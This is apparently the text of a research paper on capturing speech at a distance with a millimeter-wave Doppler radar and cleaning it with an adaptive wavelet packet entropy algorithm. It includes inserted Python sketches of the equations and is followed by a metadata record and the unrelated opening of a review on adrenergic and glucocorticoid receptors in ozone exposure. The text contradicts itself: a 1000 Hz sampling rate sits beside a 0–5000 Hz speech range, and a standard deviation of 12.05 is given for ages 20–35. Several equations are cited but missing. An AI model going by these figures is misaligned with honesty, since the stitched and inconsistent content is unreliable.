Air is not the only medium that can carry speech and be used to detect it. In our previous paper, another valuable medium, the millimeter wave (MMW), was introduced to develop a new kind of speech acquisition technique [6]. Because of the special features of MMW radar, this speech acquisition method may provide some exciting possibilities for a wide range of applications. In the present study, we have designed a new kind of speech acquisition radar system. A super-heterodyne receiver is used in the new system in order to mitigate the severe DC offset problem and the associated 1/f noise at baseband. Furthermore, in order to decrease the harmonic noise, electro-circuit noise, and ambient noise combined in the MMW-detected speech, an adaptive wavelet packet entropy algorithm is also proposed in this study, which incorporates a wavelet packet entropy based voiced/unvoiced radar speech adaptive detection method and the human ear perception properties in a wavelet packet time-scale adaptation speech enhancement process. The performance of the proposed method is evaluated objectively by signal-to-noise ratio and subjectively by mean opinion score. The results confirm that the proposed method offers improved performance over other traditional speech enhancement methods for MMW radar speech.
INTRODUCTION
It is well known that speech, which is produced by the speech organs of human beings [1][2][3], has significant effects on communication and information exchange among human beings. Acoustic speech signals have many other applications, such as those involving conversion to text or coding for transmission. However, thus far, the popular method for speech signal acquisition has been almost limited to air-conducted speech; this method is based on the fact that speech is conducted by air in free space and can easily be heard and recorded. However, this method has some serious shortcomings: (1) the acquisition distance of a traditional microphone or acoustic sensor is quite limited; therefore, people have to carry the microphone during their lectures, news reports, telephone calls, or theatrical performances. (2) The directional sensitivity of traditional speech/acoustic transducers (including microphones) is quite weak; as a result, the ability of traditional transducers to reject other acoustic disturbances may be poor. Therefore, it is not possible to acquire speech (or hear a particular sound) against a background with considerable noise, such as in the cockpit of a tank or a plane, or in any other rumbustious environment. (3) The frequency bandwidth of a traditional acoustic transducer is narrow; hence, the traditional acoustic transducer cannot be used for wide-spectrum acoustic signal acquisition. (4) The sensitivity of a traditional acoustic transducer is poor; therefore, it is not possible for the traditional acoustic transducer to detect a tiny acoustic or vibratory signal.
Another speech acquisition method, which does not depend on conduction by air and can overcome the shortcomings of the traditional speech acquisition method, is therefore required. Previous studies have proposed some methods. For example, voice content can be transmitted by way of bone vibrations. These vibrations can be picked up at the top of the skull using bone-conduction sensors, which can facilitate strong voicing [4]. Other media, such as infrared rays, light waves, and lasers, can also be used to acquire non-air-conducted speech or acoustic vibrations. However, their application is limited, since their operating conditions are constrained and the detailed materials required are usually difficult to obtain [5].
A novel non-air-conducted speech acquisition method has been developed in our laboratory [6]. This method uses a different medium, the millimeter wave, to detect and exactly identify the speech (or acoustic) signals generated by a person in free space. Radar has some special features, such as low attenuation with range, good directionality, wide frequency bandwidth, and high sensitivity [7][8][9][10][11][12][13], which the traditional speech acquisition method does not have. Therefore, this special microphone, which we call a "radar-microphone," may extend the speech and acoustic signal acquisition method to a considerable extent. Moreover, the method that involves the use of the MMW radar has the same attributes as the traditional speech acquisition method, such as noninvasiveness, safety, speed, portability, and cheapness [14]. Therefore, this new speech acquisition method may offer exciting opportunities for the following novel applications: (1) a hands-free, long-distance (> 10 m), directional speech/acoustic signal acquisition system, which can be used in both common and complex/rumbustious acoustic environments (for example, when a sharp whistle blew at the left-hand side of the radar while we were conducting the experiment in the playground, there was no whistle sound in the recorded speech); (2) the acquisition of tiny, wide-bandwidth acoustic or vibratory signals, which cannot be detected by a traditional microphone; (3) assisting clinical diagnosis or measuring speech articulator motions [15].
However, there have been only a few reports on MMW non-air-conducted speech. A similar experiment was carried out more than ten years ago [5], but no further research reports have been found. Other research on radar speech has concentrated on non-acoustic sensors [14,16,17] and on the measurement of speech articulator motions, such as vocal tract measurements and glottal excitation [15], but not on the MMW radar speech itself. Therefore, there is a need to explore this new speech acquisition method (as well as the corresponding speech enhancement algorithm) to extend the existing speech acquisition methods.
Although the MMW radar offers exciting possibilities in the field of speech (or other acoustic signal) acquisition, MMW radar speech itself has several serious shortcomings, including artificial quality, reduced intelligibility, and poor audibility. This is because the theories governing the acquisition of MMW radar speech and traditional air-conducted speech are different. Consequently, some combined harmonics of the MMW and electro-circuit noise are present in the detected speech. Furthermore, channel noise and some ambient noise also exist in the MMW radar speech [18][19][20]. Among these noises, the harmonic noise and electro-circuit noise are considerably larger and more complex than in traditional air-conducted speech, and they degrade the MMW radar speech; this is especially true for the low-frequency components (see Figure 4). This is the biggest problem that must be resolved for the application of MMW radar speech. Therefore, speech enhancement is a challenging topic for MMW radar speech research.
The special characteristics of the radar speech noise suggest that a special speech enhancement method should be developed and applied to MMW radar speech. However, very little research has been carried out on MMW radar speech enhancement.
Li et al. [6] proposed a multi-band spectral subtraction approach that takes into account the fact that colored noise affects the speech spectrum differently at various frequencies. Although the speech quality was improved by this algorithm, it suffered from an annoying artifact called "musical noise" [21,22], which is caused by narrow-band tonal components appearing somewhat periodically in each frame and occurring at random frequencies in voiced or silence regions. They also explored other methods focused on masking the musical noise using psychoacoustic models [6]; the results obtained with these algorithms show that there is a need for further improvement in the radar speech enhancement algorithm, especially under very low SNR conditions (SNR < 10 dB). Furthermore, these algorithms are based on the spectral subtraction method, which is in general effective in reducing the noise but not in improving intelligibility. Therefore, it is necessary to find a new way to improve intelligibility and reduce speech distortion while reducing noise.
The wavelet transform (WT), which can easily be obtained by filtering a signal with multi-resolution filter banks [23,24], has been applied to various research areas, including signal and image denoising, compression, detection, and pattern recognition [25][26][27][28][29][30]. Recently, the WT has been applied to signal denoising on the basis of thresholding the wavelet coefficients; wavelet thresholding (shrinkage), introduced by D. L. Donoho et al. [31], is a simple but powerful denoising technique of this kind. Previous studies have also reported the application of wavelet shrinkage to speech enhancement [32,33]; however, it is not possible to separate the signal from the noise with a simple threshold, because applying a uniform threshold to all wavelet coefficients would remove some speech components while suppressing the noise, especially for colored-noise-corrupted signals and some deteriorated speech conditions [34].
In order to overcome the limits of a uniform threshold, many previous studies successfully combined wavelet transforms with other denoising algorithms, such as Wiener filtering in the wavelet domain [35], a wavelet filter bank for spectral subtraction [36], or the coherence function [37]. The results of these methods suggest that they can improve the performance of speech enhancement; however, these wavelet-based methods generally need an estimate of the noise.
Therefore, an algorithm based on an adaptive time-scale threshold of wavelet packet coefficients [38], which does not require any knowledge of the noise level, is used in this study. To improve the performance of this algorithm for MMW radar speech, this study extends the wavelet filter banks to nonlinear Bark-scaled frequency spacing, because the sensitivity of the human ear is a nonlinear function of frequency. The proposed method attempts to find the best tradeoff between speech distortion and noise reduction, based on properties closely related to human perception.
Another issue to be resolved in most speech enhancement algorithms is the decision regarding the sectioning of voiced/unvoiced speech. Bahoura's algorithm [38] discriminated speech from silence using an experimentally determined discriminatory value of 0.35. However, this value is fixed and cannot be changed from frame to frame. This limitation is particularly important for MMW radar speech, where the combined noise decreases the SNR, thereby making it quite difficult to detect voiced/unvoiced speech sections. In order to resolve this issue effectively, the present study presents a novel approach to the segmentation of voiced/unvoiced speech sections that is based on wavelet packet analysis and entropy.
Entropy is defined as a measure of the uncertainty of information in a statistical description of a system [39], and the spectral entropy is a measure of how concentrated or widespread the Fourier power spectrum of a signal is. In this study, a time-frequency description of MMW radar speech, as given by the wavelet packet coefficients, is used to calculate the entropy, which forms the wavelet packet spectral entropy. By its very definition, the wavelet packet entropy is considerably sensitive both to the time-frequency distribution and to the uncertainty of information; therefore, this novel tool may have very useful characteristics with regard to speech section detection.
Therefore, compared to the first generation of the radar speech acquisition method [6], this research develops a new kind of Doppler radar system using a super-heterodyne receiver, in order to (1) increase the system stability and (2) decrease the hardware system noise by reducing the DC offset and 1/f noise, which degrade the system signal-to-noise ratio and detection accuracy. In addition, in order to enhance the detected radar speech, a speech enhancement algorithm is proposed, based on the time-scale adaptation of wavelet packet coefficient thresholds, incorporating human ear perception and wavelet packet entropy. The steps for radar speech enhancement and the evaluation of its effectiveness are as follows: (1) adopt wavelet packet analysis to decompose the speech into nonlinear critical sub-bands and compute the wavelet packet entropy from these wavelet packet coefficients so as to detect the voiced/unvoiced speech segments; (2) apply the time-scale adaptation of wavelet packet thresholds to the speech enhancement algorithm, incorporating the human ear perception and wavelet packet entropy approach for improving MMW radar speech; and (3) evaluate the quality of the enhanced MMW speech in comparison to speech enhanced by other representative algorithms.
Doppler Radar Detection Principle
For Doppler radar detection of throat vibration, the unmodulated signal sent from the transmitting antenna is given by Eq. (1), where f is the carrier (transmitting) frequency, t is the elapsed time, and ϕ is the residual phase. If this signal is reflected by a vital target, with a phase shift ϕ(t) produced by the electromagnetic propagation between the transmitting antenna and the target, the received signal can be approximated by Eq. (2), where k_1 is the attenuation coefficient and τ = 2R/c, with R the target distance and c the velocity of light. The radar receiver down-converts the received signal R_e(t) into a baseband signal in the mixer, Eq. (3). The high-frequency and DC components can be filtered out by proper digital signal processing (DSP), yielding the baseband signal of Eq. (4), where K is the gain of the filter and mixer. If the displacement of the throat vibration is small compared to the wavelength of the transmitted signal, then sin ϕ(t) ≈ ϕ(t), and Eq. (4) can be rewritten in the linearized form of Eq. (5) [40]. Equation (5) shows that the phase shift of the received radar signal has an almost linear relation to the baseband signal, which implies that the displacements (vibrations) of the human throat or chest can be detected using Doppler radar.
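To illustrate the linearisation leading to Eq. (5), the following Python sketch is entirely our own, with hypothetical parameter values and assuming a baseband of the form K sin ϕ(t) with ϕ(t) = 4πx(t)/λ; it compares the exact baseband signal with its small-angle approximation for a sub-millimeter throat displacement at a 35.5 GHz carrier:

    import numpy as np

    c, f = 3e8, 35.5e9                  # speed of light [m/s], carrier [Hz]
    lam = c / f                         # wavelength, ~8.5 mm
    K = 1.0                             # filter/mixer gain (arbitrary)
    t = np.linspace(0.0, 0.02, 2000)    # 20 ms observation window
    x = 50e-6 * np.sin(2*np.pi*120*t)   # 50 um throat vibration at 120 Hz
    phi = 4*np.pi*x / lam               # phase shift due to the displacement
    exact = K * np.sin(phi)             # assumed form of Eq. (4)
    linear = K * phi                    # linearized form, Eq. (5)
    print(f"max |exact - linear| = {np.max(np.abs(exact - linear)):.1e}")
    # ~7e-5: for displacements << wavelength the relation is essentially linear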
Description of the MMW Speech Acquisition System
The schematic diagram of this non-acoustic speech acquisition system is shown in Figure 1. A phase-locked oscillator generates a very stable MMW at 34.5 GHz with an output power of 100 mW. This output is fed into both the transmitting circuit and the receiving circuit. In the transmitting circuit, the MMW is up-converted to 35.5 GHz by mixing with a 1 GHz crystal oscillator; this wave is fed through a power attenuator before reaching the transmitting antenna. With the variable power attenuator, the power level of the microwave signal radiated by the antenna is controlled, with an adjustment range of 0 ∼ 35 dB.
In the receiving circuit, the reflected wave is amplified by a low-noise amplifier (noise figure 4 dB, gain 18 dB) after being received by the receiving antenna. The transmitting and receiving antennas are both parabolic antennas with a diameter of 300 mm; the estimated beam width is 9° × 9°, and the maximum antenna gain is 38.5 dB at 35.5 GHz. The amplified wave is down-converted with the 34.5 GHz phase-locked oscillator frequency and then, after amplification by an intermediate-frequency amplifier, mixed with the 1 GHz crystal oscillator frequency. A power splitter is used to divide the power of the crystal oscillator, with half of the power fed to the up-converter (transmitting circuit) and the other half to the mixer. The mixer output provides the speech signal from the body, which is amplified by a signal processor and then passed through an A/D converter before reaching a computer for further processing. All the signals were sampled at a frequency of 1000 Hz.
As shown in Figure 1, two dashed boxes mark the transmitting circuit and the receiving circuit separately. The advantage of this kind of radar component layout is that it employs a two-step indirect-conversion transceiver, so as to mitigate the severe DC offset problem and the associated 1/f noise at baseband that normally occur in direct-conversion receivers. Compared to the single antenna we used before [6], the antenna array has a higher directive gain, which can both increase the detection distance and reduce interference from other directions. During detection, a 16-channel PowerLab data acquisition system (ADInstruments) displayed and recorded the radar baseband signal; this signal was further processed using a MATLAB program (R2007b).
Bark (Critical) Band
It is well known that the sensitivity of the human ear varies nonlinearly across the frequency spectrum: the perception by the auditory system of a signal at a particular frequency is influenced by the energy of a perturbation signal in a critical band around this frequency. The bandwidth of this critical band, furthermore, varies with frequency. A commonly used scale for the critical bands is the Bark band, which divides the audible frequency range of 0 ∼ 16 kHz into 24 abutting bands. An approximate analytical expression describing the relationship between the linear frequency f (in Hz) and the critical band number B (in Bark) is [41]: B = 13 arctan(0.00076 f) + 3.5 arctan[(f/7500)^2] (6). In this paper, the linear frequency range of the radar speech is 0 ∼ 5000 Hz; the wavelet packet decomposition level is therefore set to 6. Figure 2 illustrates the relationship between the frequency in hertz and the critical-band rate in Bark. Figure 2. Nineteen bands of a wavelet packet tree that closely mimic the critical bands.
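The frequency-to-Bark mapping of Eq. (6) is easy to evaluate numerically; the Python sketch below implements it (assuming, as is common, the Zwicker-Terhardt form for the expression of [41]):

    import numpy as np

    def hz_to_bark(f_hz):
        """Critical-band rate B (Bark) for frequency f (Hz), Eq. (6)."""
        f = np.asarray(f_hz, dtype=float)
        return 13.0*np.arctan(0.00076*f) + 3.5*np.arctan((f/7500.0)**2)

    print(hz_to_bark(5000.0))  # ~18.5 Bark: 0-5 kHz spans about 19 critical bands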
Wavelet Packet Analysis
Wavelet packet analysis (WPA), which is based on the wavelet transform, offers a large range of possibilities for signal analysis [42]. If the noisy speech y(n) consists of the clean speech signal s(n) and the uncorrelated additive noise signal d(n), then: y(n) = s(n) + d(n) (7). For a given level i, the wavelet packet transform (WPT) decomposes the noisy signal y(n) into 2^i subbands, with the corresponding wavelet coefficient sets denoted w^i_{j,m} (Eq. (8)), where w^i_{j,m} denotes the mth coefficient of the jth subband at the ith level, with m = 1, ..., N/2^i and j = 1, ..., 2^i. In this study, i is set to 6 for the Bark-band decomposition.
The enhanced speech is synthesized by the inverse transformation of the processed wavelet packet coefficients (Eq. (9)), where ŝ(n) is the enhanced radar speech and ŵ^i_{j,m} is the updated wavelet packet coefficient calculated by the algorithm stated below.
Wavelet Packet Entropy
The subband wavelet packet entropy is defined in terms of the relative wavelet energy of the wavelet coefficients [43]. The energy for each subband j at level i can be calculated as E^i_j = Σ_m |w^i_{j,m}|^2 (10). The total energy of the wavelet packet coefficients is then E_tot = Σ_j E^i_j (11), and the probability distribution for each level can be defined as p^i_j = E^i_j / E_tot (12). Following the definition of entropy given by Shannon (1948) [44], the subband wavelet packet entropy is defined using the probability distribution associated with scale level i (for further details see [43] and [45]): H(i) = -Σ_j p^i_j ln p^i_j (13). Two adaptive wavelet packet entropy thresholds are selected to detect the onset and offset of MMW radar speech. The speech onset threshold is T_s and the offset threshold is T_n. T_s is defined by adding a fixed value E_s to a past mean wavelet packet entropy value T_m, calculated over the previous t ms (five frames). The speech offset (noise) threshold T_n is calculated by adding another fixed value E_n to T_m. Speech onset is detected when H(i) (Eq. (13)) exceeds T_s, and speech offset is detected when H(i) drops below T_n. Therefore, the wavelet packet entropy thresholds can be dynamically adjusted. In this study of MMW radar speech, E_s and E_n are set to the constant values of 1.7 and 1.3, respectively.
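For concreteness, Eqs. (10)-(13) translate into a few lines of Python; the sketch below uses the PyWavelets package, with the wavelet choice and frame handling being our own assumptions:

    import numpy as np
    import pywt

    def wp_entropy(frame, wavelet="db4", level=6):
        """Subband wavelet packet entropy H(i) of one speech frame, Eq. (13)."""
        wp = pywt.WaveletPacket(data=frame, wavelet=wavelet,
                                mode="symmetric", maxlevel=level)
        energies = np.array([np.sum(node.data**2)                  # Eq. (10)
                             for node in wp.get_level(level, order="freq")])
        p = energies / np.sum(energies)                            # Eqs. (11)-(12)
        p = p[p > 0]                                               # avoid log(0)
        return -np.sum(p * np.log(p))                              # Eq. (13)

    # Onset when H exceeds T_s = T_m + E_s; offset when H drops below T_n = T_m + E_n.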
Speech Enhancement Based on Time-scale Adaptation
The proposed enhancement scheme is presented in Figure 3. First, we perform wavelet packet decomposition using the nonlinear Bark bands, and then carry out voiced/unvoiced speech section detection using the adaptive wavelet packet entropy thresholds. Next, we calculate the time-scale adapted threshold on the basis of the Teager energy operator, mask construction, and the thresholding process.
Finally, we synthesize the enhanced speech with a wavelet packet inverse transform of the processed wavelet coefficients. a. Teager energy operator: In order to carry out the time-adapting approach, the Teager energy operator (TEO) [46] is used to create a mask [38]; it is calculated from the resulting wavelet coefficients w^i_{j,m} of each subband j (Eq. (14)). b. Mask processing for the time-adapting threshold: An initial mask for each subband j is constructed by smoothing the corresponding TEO coefficients and normalizing, as determined by Eq. (15) [46], where h_j(m) is a second-order IIR low-pass filter and the max is the maximum of the smoothed TEO coefficients in the considered subband. For an unvoiced speech section, the mask is directly set to 0. For a voiced speech section, the mask is normalized before applying a root power function of 1/8, in order to implement a compromise between noise removal and speech distortion (Eq. (16)) [38], where S^i_j is given by the abscissa of the maximum of the amplitude distribution of the corresponding mask M^i_{j,m}. c. Thresholding process: A scale-adapted wavelet threshold, derived from the level-dependent threshold [38,47], is used in this study. For a given subband j, the corresponding threshold λ_j is defined as λ_j = (MAD_j/0.6745) √(2 log N) (17), where N is the length of the noisy speech in each subband and MAD_j is the median of the absolute values of the coefficients estimated in subband j. The time-scale adapted threshold is then obtained by adapting the corresponding threshold in the time domain (Eq. (18)), where α is an adjustment parameter (α = 1). Soft thresholding, as defined by Donoho and Johnstone [48,49], is then applied to the wavelet packet coefficients: ŵ^i_{j,m} = sign(w^i_{j,m}) · max(|w^i_{j,m}| - λ_{j,m}, 0) (19). The enhanced signal can therefore be synthesized with the inverse transformation WP^(-1) of the processed wavelet coefficients (Eq. (9)).
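The main building blocks of the thresholding stage can likewise be sketched in Python. This is a simplified illustration of Eqs. (14), (17) and (19) only; the mask smoothing and normalization of Eqs. (15)-(16) and the α-adaptation of Eq. (18) are omitted, and the edge handling is our own choice:

    import numpy as np

    def teager(w):
        """Teager energy operator of a coefficient sequence, Eq. (14)."""
        psi = np.empty_like(w)
        psi[1:-1] = w[1:-1]**2 - w[:-2]*w[2:]
        psi[0], psi[-1] = psi[1], psi[-2]       # simple edge handling
        return np.abs(psi)

    def subband_threshold(w, N):
        """Level-dependent threshold lambda_j of Eq. (17)."""
        mad = np.median(np.abs(w))
        return (mad / 0.6745) * np.sqrt(2.0 * np.log(N))

    def soft_threshold(w, lam):
        """Donoho-Johnstone soft thresholding, Eq. (19)."""
        return np.sign(w) * np.maximum(np.abs(w) - lam, 0.0)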
Subjects
Ten healthy volunteer speakers, 6 males and 4 females, participated in the radar speech experiment. All the subjects were native speakers of Mandarin Chinese. Their ages varied from 20 to 35, with a mean age of 28.1 (SD = 12.05). All the experiments were conducted in accordance with the terms of the Declaration of Helsinki (BMJ 1991; 302: 1194), and appropriate consent forms were signed by the volunteers. The distance between the radar antenna and the human subjects ranged from 2 m to 30 m. Ten sentences of Mandarin Chinese were used as the speech material for acoustic analysis and acceptability evaluation. The lengths of the sentences varied from 6 words (5.6 s) to 30 words (15 s). The sentences were spoken by each participant in a quiet experimental environment. The speakers were instructed to read the speech material at normal loudness and speaking rates.
Additive Noise
In order to test the effectiveness of the proposed method, two different types of background noise, namely white Gaussian noise and speech babble noise, were added to the MMW radar speech; both noises were taken from the NOISEX-92 database. These two representative noises have a greater similarity to actual talking conditions than other noises. Noise at SNRs of -10, -5, 0, +5, and +10 dB was added to the original MMW radar speech signal. The SNR is defined as SNR = 10 log10 [Σ_n s(n)^2 / Σ_n (s(n) - ŝ(n))^2] (20), where s(n) is the clean speech, ŝ(n) is the enhanced speech, and N is the number of samples in the clean and enhanced speeches.
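Eq. (20) translates directly into code; a minimal Python helper (names ours) is:

    import numpy as np

    def snr_db(clean, enhanced):
        """Output SNR of Eq. (20), in dB."""
        noise = clean - enhanced
        return 10.0 * np.log10(np.sum(clean**2) / np.sum(noise**2))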
Perceptual Evaluation
For the perceptual experiment, eight listeners were selected to evaluate the acceptability of each sentence based on the mean opinion score (MOS), a five-point scale (1: bad; 2: poor; 3: common; 4: good; 5: excellent). All the listeners were native speakers of Mandarin Chinese, had no reported history of hearing problems, and were unfamiliar with MMW radar speech. Their ages varied from 22 to 36, with a mean age of 26.37 (SD = 4.63). The listening tasks took place in a soundproof room, and the speech samples were presented to the listeners at a comfortable loudness level (60 dB sound pressure level (SPL)) via high-quality headphones. A 4-s pause was inserted before each citation word, and the order in which the speech samples were presented was randomized, to allow the listeners time to respond and to avoid rehearsal effects.
RESULTS AND DISCUSSIONS
The performance of the proposed algorithm is evaluated and compared to that of other algorithms, including the noise estimation algorithm [50], traditional wavelet transform denoising methods [49], and the time-scale adaptation algorithm [38]. For evaluation purposes, 100 sentences, spoken by 6 male and 4 female volunteer speakers, are used. Generally, a speech enhancement system produces two main undesirable effects: residual noise and speech distortion. However, these effects are difficult to quantify with traditional objective measures. Therefore, speech spectrograms were used in this study, since they have been identified as a well-suited tool for observing both the residual noise and the speech distortion. In addition, the results were evaluated objectively by signal-to-noise ratio (SNR) and subjectively by mean opinion score (MOS) under conditions of different additive white Gaussian noise as well as babble noise (for MOS). Figure 4 shows the spectrograms of the original MMW radar speech (a), the speech enhanced using the noise estimation algorithm (b), the speech enhanced using the traditional wavelet transform denoising algorithm (c), the speech enhanced using the time-scale adaptation algorithm (d), and the speech enhanced using the proposed adaptive wavelet packet entropy algorithm (e).
As stated earlier, combined noises are introduced into the original MMW radar speech. These noises can be clearly seen in Figure 4(a), especially in the speech-pause regions. It can also be seen from the figure that the noises are mainly concentrated in the low-frequency components, roughly below 3 kHz. Figures 4(b) and (c) show that the noise estimation algorithm and the traditional wavelet transform denoising method are effective in reducing the combined radar noises, both in the speech and the non-speech sections. However, too much remnant noise is left in the enhanced speech, especially in the frequency range in which the noise is concentrated, suggesting that the noise reduction is not satisfactory. It can be seen from Figure 4(d) that the time-scale adaptation algorithm has a positive effect on enhancing MMW radar speech, but does not entirely remove the noise. Figure 4(e) shows that the proposed adaptive wavelet packet entropy threshold algorithm can not only greatly reduce the low-frequency noise, in which the combined radar noise is concentrated, but also almost completely eliminate the high-frequency noise. It can be seen from the figure that in the speech-pause regions the residual noise is almost eliminated. Moreover, it is clear that the residual noise is greatly reduced and has lost its structure. These results suggest that the proposed algorithm achieves a better reduction of the whole-frequency noise than the other methods.
The mean results of the SNR measurements, an objective measure, for 100 MMW radar sentences are shown in Figure 5; each sentence was corrupted by white noise at -10, -5, 0, +5, and +10 dB SNR levels.
The methods compared include the noise estimation algorithm (noise estimation), traditional wavelet transform denoising (wavelet transform), the time-scale adaptation algorithm (time-scale adaptation), and the proposed adaptive wavelet packet entropy algorithm (wavelet packet entropy). As shown in Figure 5, the proposed method has the best performance, followed by the time-scale adaptation algorithm and the noise estimation method. It can also be seen from the figure that the proposed method performs nearly 2 dB better than any of the other above-mentioned methods in the -10 dB noise case; this difference decreases with increasing SNR, suggesting that the proposed method performs considerably better than the other methods, especially in the low-SNR noise cases.
The perceptual analysis scores (subjective results) obtained using the MOS for these same conditions are shown in Figure 6. Eight listeners were asked to rate the sentences for quality, as stated before. MOSs were obtained for 100 original MMW radar sentences produced by the ten volunteer speakers and for the noisy sentences with white and babble noise at 0 dB SNR. The score of the speech enhanced by the proposed adaptive wavelet packet entropy algorithm is the highest, followed by those of the time-scale adaptation algorithm and the noise estimation algorithm. This is true for both the original speech and the noisy speech. Informal listening tests also indicated that the speech enhanced with the proposed algorithm is more pleasant, with much reduced residual noise and minimal, if any, speech distortion. This is because the time and scale wavelet packet thresholds can be adaptively adjusted in each Bark band; the Bark band also takes into account the frequency-domain masking properties of the human auditory system, thus preventing quality deterioration of the speech during the thresholding process.
These results indicate that the proposed adaptive wavelet packet entropy algorithm is better suited for MMW radar speech enhancement than the other above-mentioned methods, especially in the case of additive noise. Because the thresholds used to determine the voiced/unvoiced speech sections are fixed and cannot be changed from frame to frame, the time-scale adaptation method cannot reduce the noise effectively. This limitation is worse for the enhancement of MMW radar speech, especially at low SNRs (see Figure 5). With the wavelet packet entropy thresholds of the proposed algorithm, voiced/unvoiced speech sections can be determined adaptively. Furthermore, based on the frame-by-frame adaptation of the time-scale wavelet packet thresholds in each Bark band, the algorithm can realize a good tradeoff between reducing noise, increasing intelligibility, and keeping the distortion acceptable to a human listener. Moreover, the time-scale threshold of the wavelet packet coefficients can be adequately and adaptively adjusted; this makes it possible to obtain better speech quality via speech enhancement in some rigorous speech environments.
The adaptive wavelet packet entropy algorithm is also computationally practical. Although the wavelet packet entropy analysis increases the computational load, a great benefit of the proposed algorithm is that neither an explicit estimate of the noise level nor a priori knowledge of the SNR is required, which saves considerable computation. Considering its better speech enhancement performance, the proposed algorithm is quite efficient.
As a single-channel wavelet-type speech enhancement method, the adaptive wavelet packet entropy algorithm proposed in this paper can be applied to the enhancement of MMW radar speech in practical situations. For example, an MMW speech enhancing system embedding this algorithm can be developed. With the help of digital signal processing (DSP) technology, the speech enhancement function can be realized on a microprocessor and implanted into a radar-telephone, radar-microphone, or other electronic equipment. Different enhancement algorithms, suitable for different noise conditions, can be selected by a switch. With the development of efficient enhancement methods, the quality of MMW speech will be vastly improved and will provide better perception.
As a novel speech acquisition method, the MMW radar speech acquisition method can not only be used as a substitute for existing speech acquisition methods but can also compensate for several serious shortcomings of traditional microphone speech, such as limited acquisition distance and directional sensitivity. Therefore, the MMW radar speech acquisition method can be combined with traditional speech acquisition equipment in order to improve the performance of speech acquisition and to extend its fields of application.
CONCLUSION
By means of a super-heterodyne millimeter wave radar, a new kind of non-air-conducted speech acquisition method (radar system) is introduced in this study. Because of the special features of the millimeter wave radar, this method can provide some exciting possibilities for a wide range of applications.
However, radar speech is substantially degraded by additive combined noises that include radar harmonic noise, electro-circuit noise, and ambient noise. This study proposes an adaptive wavelet packet entropy algorithm that incorporates human ear perception and time-scale adaptation. Results from both the objective and the subjective measures/evaluations suggest that this method can not only greatly reduce the whole-frequency noise but also prevent the speech from quality deterioration, especially in the low-SNR noise cases. Furthermore, the proposed algorithm is efficient because an explicit estimation of the noise level is not required. | 2016-01-07T01:57:53.067Z | 2012-01-01T00:00:00.000 | {
"year": 2012,
"sha1": "4993c3f547c9a31d034945c376b3bcf7e3afeff0",
"oa_license": null,
"oa_url": "http://www.jpier.org/PIER/pier130/02.12052207.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "4993c3f547c9a31d034945c376b3bcf7e3afeff0",
"s2fieldsofstudy": [
"Business"
],
"extfieldsofstudy": [
"Computer Science"
]
} |
235644323 | pes2o/s2orc | v3-fos-license | Adrenergic and Glucocorticoid Receptors in the Pulmonary Health Effects of Air Pollution
Adrenergic receptors (ARs) and glucocorticoid receptors (GRs) are activated by circulating catecholamines and glucocorticoids, respectively. These receptors regulate the homeostasis of physiological processes with specificity via multiple receptor subtypes, wide tissue-specific distribution, and interactions with other receptors and signaling processes. Based on their physiological roles, ARs and GRs are widely manipulated therapeutically for chronic diseases. Although these receptors play key roles in inflammatory and cellular homeostatic processes, little research has addressed their involvement in the health effects of air pollution. We have recently demonstrated that ozone, a prototypic air pollutant, mediates pulmonary and systemic effects through the activation of these receptors. A single exposure to ozone induces the sympathetic–adrenal–medullary and hypothalamic–pituitary–adrenal axes, resulting in the release of epinephrine and corticosterone into the circulation. These hormones act as ligands for ARs and GRs. The roles of beta ARs (βARs) and GRs in ozone-induced pulmonary injury and inflammation were confirmed in a number of studies using interventional approaches. Accordingly, the activation status of ARs and GRs is critical in mediating the health effects of inhaled irritants. In this paper, we review the cellular distribution and functions of ARs and GRs, their lung-specific localization, and their involvement in ozone-induced health effects, in order to draw attention to them for future research.
Introduction
Circulating stress hormones are ligands for adrenergic receptors (ARs) and glucocorticoid receptors (GRs), ubiquitously distributed in the body; they are essential for responding to stress signals, orchestrating stress responses, and maintaining the homeostatic physiological function of major organ systems. In the lungs, these receptors have key roles in bronchoconstriction, microvascular contractility, maintaining immune surveillance, and alveolar patency [1,2]. Thus, it is conceivable that air pollution exposure, which causes irritation, alteration in breathing, and subsequent inflammation, directly or indirectly involves the activity of these receptors. However, until recently, only a few studies have examined the role of ARs or GRs in mediating the health effects of air pollution [3][4][5][6][7]. Some studies have assessed the contributions of ARs to pulmonary inflammation [8], whereas others have examined their role in the cardiovascular health effects of air pollutants [9]. Likewise, the contribution of GRs has also been examined in a limited number of air pollution studies [10]. This is despite the extensive therapeutic manipulation of these receptors for major chronic lung diseases, such as asthma and chronic obstructive pulmonary disease (COPD) [11]. For both diseases, the first-line therapy involves the use of beta-2 AR (β 2 AR) agonists as bronchodilators and steroidal GR agonists as immunosuppressants, which function to inhibit lung inflammation [12,13]. As AR and GR agonists have lifesaving therapeutic implications for lung diseases, their involvement in orchestrating and resolving lung injury and inflammation after air pollution exposure warrants further attention.
Our recent studies have examined the roles of these receptors in mediating ozone-induced lung injury and inflammation, where ozone has been used as a prototypic air pollutant. We have shown that the activation of these receptors is necessary in mediating pulmonary injury and inflammation after ozone exposure (Figure 1) [4][5][6][7]14,15], and believe that they will have much broader implications for the health effects of air pollution. The goal of this paper is to discuss the critical contribution of ARs and GRs in the acute pulmonary effects of ozone, and we propose integrating the potential roles of these receptors in future studies involving other air pollutants. First, we will provide a general perspective on the functions and distribution of AR and GR subtypes, their involvement in homeostasis, and cellular signaling resulting from changes in circulating ligands for these receptors. Then, we will focus on the distribution of ARs and GRs in the lungs, and their relevance in chronic cardiopulmonary diseases. Based on the roles of ARs and GRs in the lungs, we will explain how ozone exposure leads to increased activity of these receptors. We will discuss how AR and GR cellular signaling may be involved in modulating pulmonary injury, vascular leakage, inflammation, and even circadian changes through their activation. Finally, we will emphasize the importance of integrating the functions of these receptors in future air pollution studies examining mechanisms of pulmonary injury, inflammation, therapeutic interventions, and a potential link to altered diurnal rhythmicity.

Figure 1. Upon inhalation, air pollutants likely activate autonomic sensory nerves, which relay stress signals to the hypothalamus through the brainstem. This stimulates the hypothalamus to induce changes in the neuroendocrine pathways, including the activation of the SAM and HPA axes, which results in the release of catecholamines, such as epinephrine, and cortisol/corticosterone into the circulation. These hormones mediate their effects through widely distributed receptors for catecholamines (ARs) and glucocorticoids (GRs). These receptors, in addition to mediating homeostatic changes in physiological processes and diurnal variations, respond to air pollution stress and direct bodily immune and metabolic responses at the site of injury. These processes result in a local inflammatory response that is governed by multiple organs, including the brain. IL-6: interleukin 6; TLR2: toll-like receptor 2; TLR4: toll-like receptor 4.
